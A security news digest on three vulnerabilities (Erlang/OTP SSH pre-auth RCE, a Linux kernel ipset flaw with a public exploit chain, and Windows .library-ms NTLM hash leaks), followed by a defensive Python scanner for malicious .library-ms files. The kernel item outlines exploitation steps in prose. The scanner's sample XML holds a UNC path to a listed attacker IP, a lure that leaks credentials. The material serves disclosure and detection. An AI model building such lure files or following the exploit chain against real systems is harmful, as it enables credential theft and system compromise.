Critical RCE Flaw in Erlang/OTP SSH Daemon Poses Immediate Risk to High-Availability Systems
A critical vulnerability in the Erlang/OTP SSH daemon, tracked as CVE-2025-32433, has been disclosed and assigned a severity score of 10.0 because it allows unauthenticated remote code execution. The flaw stems from improper handling of pre-authentication protocol messages: the daemon accepts and acts on specially crafted packets before authentication has completed. If exploited, an attacker can run arbitrary commands with the privileges of the SSH daemon (often root), leading to full system compromise. The vulnerability affects every device running the affected Erlang/OTP SSH application, which is commonly deployed in telecom systems and fault-tolerant environments.

Security researchers from Ruhr University Bochum discovered the issue, and Erlang/OTP versions 25.3.2.10 and 26.2.4 have been released to address it. Security experts, including Horizon3’s Attack Team, have already reproduced the flaw and built a working proof-of-concept, warning that exploitation is trivial and that public PoCs are likely to follow soon. The risk of mass exploitation is high, especially in environments where Erlang-based services are exposed to the Internet.

Organizations are strongly urged to apply the patches without delay. For devices that cannot be updated immediately (particularly those embedded in industrial or mission-critical systems), it is essential to restrict SSH access to known, trusted IP addresses, or to disable the SSH service altogether if it is not in use. Given the attack's simplicity and critical impact, this vulnerability is an urgent threat that defenders must address proactively.
Critical Linux Kernel Vulnerability CVE-2024-53141 Poses High Risk Amid PoC Release
A newly disclosed vulnerability in the Linux kernel’s ipset component, tracked as CVE-2024-53141, is drawing concern after security researchers released a working proof-of-concept exploit. The flaw exists in the bitmap_ip_uadt function within ip_set_bitmap_ip.c, where improper bounds checking allows an out-of-bounds write on the kernel heap. Specifically, when the IPSET_ATTR_CIDR attribute is supplied without IPSET_ATTR_IP_TO, the calculated IP range can exceed the allowed boundaries, leading to uncontrolled memory writes. This oversight lets attackers manipulate kernel structures, making arbitrary code execution with elevated privileges possible. Since ipsets underpin Linux firewalls and IP filtering mechanisms, any compromise at this level directly threatens system integrity and security.

The released exploit demonstrates a full attack chain: it begins with information leaks via ipset’s comment feature, followed by arbitrary memory writes using ipset counters. These primitives are combined with kernel heap manipulation techniques, such as heap spraying and triggering use-after-free conditions via kernel objects like pipe_buffer and msg_msgseg. Ultimately, the exploit redirects code execution by controlling the instruction pointer (RIP) and overwriting the core_pattern kernel parameter so that a custom binary is invoked with root-level permissions when a process crashes.

Given the availability of public exploit code and the vulnerability’s low complexity, the risk of widespread exploitation is high. Linux system administrators are strongly advised to apply patches immediately or deploy available mitigations. Environments relying on ipset for network filtering, particularly those with exposed or multi-tenant configurations, should treat this as a critical security issue. Continuous monitoring for abnormal ipset activity and memory access anomalies is recommended to detect potential exploitation attempts.
CVE-2025-24054 Exploited in Active Phishing Campaigns to Leak NTLM Hashes
A recently patched Windows vulnerability, CVE-2025-24054, entered active exploitation just weeks after Microsoft released a fix in its March 2025 Patch Tuesday. Initially rated as “less likely to be exploited,” the flaw is now being abused in phishing campaigns aimed at government and private-sector organizations, particularly in Poland and Romania.

The attack leverages [.]library-ms files, which Windows normally uses to display virtual folders. In this campaign, attackers crafted [.]library-ms files that point to malicious remote SMB servers. When a victim interacts with the file (by clicking, right-clicking, or even just selecting it), Windows initiates an SMB connection to the attacker-controlled server and, in doing so, sends the user's NTLM authentication hashes. Check Point researchers observed that the earliest wave of attacks delivered the [.]library-ms files inside ZIP archives hosted on Dropbox, but by late March the files were being distributed directly without compression, requiring even less user interaction. Alongside the [.]library-ms files, the phishing bundles often included other shortcut files (xd[.]url, xd[.]website, xd[.]link) that exploit known NTLM hash exposure issues, likely to increase the chance of a successful leak.

While Microsoft continues to phase out NTLM in favor of more secure protocols, many environments still rely on it, which makes this a valuable technique for attackers seeking credentials that can later be cracked or replayed. Two IP addresses involved, 159[.]196[.]128[.]120 and 194[.]127[.]179[.]157, were linked to these campaigns, though attribution remains inconclusive despite some overlap with infrastructure previously tied to APT28. Security teams are urged to apply the March 2025 updates immediately, disable NTLM where feasible, and monitor SMB traffic for signs of credential leaks or unauthorized external connections.
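The mechanism described above (a .library-ms file whose location points at a remote SMB host, so that merely browsing to the file triggers an outbound NTLM exchange) can be caught before a user ever touches the file by inspecting the XML inside it. The following is an added example, not code from the original article or from Check Point: it parses a .library-ms document, pulls every location URL, and flags UNC paths whose host is a non-RFC1918 IP or a hostname outside an allowlist. The sample file and the `corp.example` allowlist are constructed; the external IP is the one the article lists. The element path (`searchConnectorDescription/simpleLocation/url` under the `http://schemas.microsoft.com/windows/2009/library` namespace) is my reading of the public Library Description schema and should be checked against real samples before relying on it.

```python
import ipaddress
import re
import xml.etree.ElementTree as ET

# Namespace used by Windows Library Description (.library-ms) files (assumed from the public schema).
LIBRARY_NS = "{http://schemas.microsoft.com/windows/2009/library}"

# Constructed allowlist of internal file-server domains; adjust to your environment.
TRUSTED_DOMAIN_SUFFIXES = ("corp.example",)

# Address ranges that should never be treated as "external" SMB destinations.
INTERNAL_NETWORKS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16", "fc00::/7", "fe80::/10", "::1/128",
)]

# Constructed sample .library-ms content: one external IP (from the article's IoC list),
# one trusted internal hostname, one RFC1918 address.
SAMPLE_LIBRARY_MS = r"""<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <version>6</version>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation><url>\\159.196.128.120\share</url></simpleLocation>
    </searchConnectorDescription>
    <searchConnectorDescription>
      <simpleLocation><url>\\fileserver.corp.example\docs</url></simpleLocation>
    </searchConnectorDescription>
    <searchConnectorDescription>
      <simpleLocation><url>\\10.0.0.5\public</url></simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""

# Matches the host part of \\host\share, //host/share or file://host/share.
UNC_RE = re.compile(r"^(?:\\\\|//|file://)([^\\/]+)")


def extract_locations(xml_text):
    """Return every <url> text found anywhere in the library description."""
    root = ET.fromstring(xml_text)
    return [u.text.strip() for u in root.iter(LIBRARY_NS + "url") if u.text]


def host_of(location):
    """Host named by a UNC/file URL, or None for local paths and anything unrecognised."""
    m = UNC_RE.match(location)
    return m.group(1) if m else None


def classify_host(host):
    """Label a host as internal-ip, public-ip, trusted-host or untrusted-host."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        name = host.lower()
        for suffix in TRUSTED_DOMAIN_SUFFIXES:
            if name == suffix or name.endswith("." + suffix):
                return "trusted-host"
        return "untrusted-host"
    if any(ip in net for net in INTERNAL_NETWORKS):
        return "internal-ip"
    return "public-ip"


def scan_library_ms(xml_text):
    """Return (location, host, verdict) for every location that would make Windows
    authenticate to a host outside the organisation."""
    findings = []
    for loc in extract_locations(xml_text):
        host = host_of(loc)
        if host is None:
            continue  # local folder; no SMB connection, nothing to leak
        verdict = classify_host(host)
        if verdict in ("public-ip", "untrusted-host"):
            findings.append((loc, host, verdict))
    return findings


if __name__ == "__main__":
    for loc, host, verdict in scan_library_ms(SAMPLE_LIBRARY_MS):
        print(f"SUSPICIOUS {verdict}: {loc} (host {host})")
```

Run against attachments at the mail gateway or in a sandbox, a single finding is enough to quarantine the file: a legitimate library never needs to reference a public IP. Treating hostnames outside the allowlist as suspicious rather than only public IPs matters because an attacker-controlled DNS name leaks NTLM just as effectively as a bare address.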